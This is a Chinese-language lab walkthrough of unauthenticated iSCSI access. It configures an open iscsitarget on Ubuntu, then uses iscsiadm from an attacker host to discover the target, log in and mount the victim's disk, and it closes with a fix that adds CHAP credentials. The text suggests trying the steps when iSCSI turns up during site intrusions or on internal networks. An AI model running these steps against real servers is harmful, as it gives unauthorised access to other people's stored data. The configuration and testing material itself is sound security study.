ISCSI未授权访问漏洞
环境搭建
- Target
- OS: ubuntu 14.04
- IP: 192.168.197.135
- Attacker
- OS: CentOS 7
- IP: 192.168.197.136
配置ISCSI服务端
安装iscsitarget
# apt-get install iscsitarget
修改配置文件/etc/default/iscsitarget
ISCSITARGET_ENABLE=true
ISCSITARGET_MAX_SLEEP=3
# ietd options
# See ietd(8) for details
ISCSITARGET_OPTIONS=""
修改另一个配置文件:/etc/iet/ietd.conf
Target iqn.2016-08.ll.test:storage
Lun 0 Path=/dev/sda,Type=fileio,ScsiId=lun0,ScsiSN=lun0
然后重启iscsi服务:
# /etc/init.d/iscsitarget restart
* Removing iSCSI enterprise target devices:[ OK ]
* Stopping iSCSI enterprise target service:[ OK ]
* Removing iSCSI enterprise target modules:[ OK ]
* Starting iSCSI enterprise target service:[ OK ]
测试过程
先来安装相关的工具:
sudo yum install epel-release
sudo yum install scsi-target-utils
sudo yum install iscsi-initiator-utils
然后我们来获取目标的iqn,如果获取失败,可以检查一下是否有开启iscsid服务,没有的话通过service iscsi start开启。
$ sudo iscsiadm --mode discovery --type sendtargets --portal 192.168.197.135
192.168.197.135:3260,1 iqn.2016-08.ll.test:storage
172.17.42.1:3260,1 iqn.2016-08.ll.test:storage
发现了iqn之后,挂载磁盘就可以了
$ sudo iscsiadm -m node -T iqn.2016-08.ll.test:storage -p 192.168.197.135 -l
Logging in to [iface: default, target: iqn.2016-08.ll.test:storage, portal: 192.168.197.135,3260] (multiple)
Login to [iface: default, target: iqn.2016-08.ll.test:storage, portal: 192.168.197.135,3260] successful.
看一下挂载到了什么位置
sudo fdisk -l
Disk /dev/sda: 21.5 GB, 21474836480 bytes, 41943040 sectors
Units = sectors of 1 * 512 = 512 bytes
Sector size (logical/physical): 512 bytes / 512 bytes
I/O size (minimum/optimal): 512 bytes / 512 bytes
Disk label type: dos
Disk identifier: 0x0004df07
Device Boot Start End Blocks Id System
/dev/sda1 * 2048 1026047 512000 83 Linux
/dev/sda2 1026048 41943039 20458496 8e Linux LVM
Disk /dev/mapper/centos-root: 18.8 GB, 18756927488 bytes, 36634624 sectors
Units = sectors of 1 * 512 = 512 bytes
Sector size (logical/physical): 512 bytes / 512 bytes
I/O size (minimum/optimal): 512 bytes / 512 bytes
Disk /dev/mapper/centos-swap: 2147 MB, 2147483648 bytes, 4194304 sectors
Units = sectors of 1 * 512 = 512 bytes
Sector size (logical/physical): 512 bytes / 512 bytes
I/O size (minimum/optimal): 512 bytes / 512 bytes
Disk /dev/sdc: 42.9 GB, 42949672960 bytes, 83886080 sectors
Units = sectors of 1 * 512 = 512 bytes
Sector size (logical/physical): 512 bytes / 512 bytes
I/O size (minimum/optimal): 512 bytes / 512 bytes
Disk label type: dos
Disk identifier: 0x00023447
Device Boot Start End Blocks Id System
/dev/sdc1 * 2048 79693823 39845888 83 Linux
/dev/sdc2 79695870 83884031 2094081 5 Extended
/dev/sdc5 79695872 83884031 2094080 82 Linux swap / Solaris
其中sdc就是被挂载的ubuntu,mount处理一下
# mkdir /tmp/ubuntu
# mount /dev/sdc1 /tmp/ubuntu
# cd /tmp/ubuntu
这样就可以访问到ubuntu中的文件了。
所以如果在日站的时候和内网发现了iscsi服务,可以尝试着挂载一下。
断开连接
iscsiadm -m node -u
修复
对于该漏洞的修复也十分简单,只要增加认证就可以了,但是密码的长度似乎不能超过12个字符。
修改配置文件为:
Target iqn.2016-08.ll.test:storage
Lun 1 Path=/dev/sda,Type=fileio,ScsiId=lun1,ScsiSN=lun1
incominguser your_username your_password
如果需要连接带有密码的iscsi,则需要在配置文件/etc/iscsi/iscsid.conf中配置好才可以连接。
如果在ubuntu上连接iscsi服务的话,需要安装open-iscsi和open-iscsi-utils才可以。
